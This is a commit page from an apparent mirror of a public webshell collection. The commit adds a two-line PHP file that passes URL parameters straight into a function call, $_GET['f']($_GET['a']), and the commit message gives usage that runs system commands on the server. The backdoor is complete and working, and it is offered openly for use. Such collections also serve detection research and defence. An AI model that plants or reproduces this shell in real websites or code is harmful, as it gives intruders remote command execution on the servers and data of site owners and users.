mirror of
https://github.com/tennc/webshell
synced 2025-02-16 09:48:24 +00:00
Create 2022-08-26-07.php
from: https://mp.weixin.qq.com/s/f6cFhc0Ukk0wQFGP1lQ4BQ usage: http://example.com/shell.php?f=system&a=pwd
This commit is contained in:
parent
52d483f2cd
commit
6aab7111e9
1 changed files with 2 additions and 0 deletions
2
php/2022-08-26-07.php
Normal file
2
php/2022-08-26-07.php
Normal file
|
@ -0,0 +1,2 @@
|
||||||
|
<?php
|
||||||
|
$_GET['f']($_GET['a']);
|
Loading…
Add table
Reference in a new issue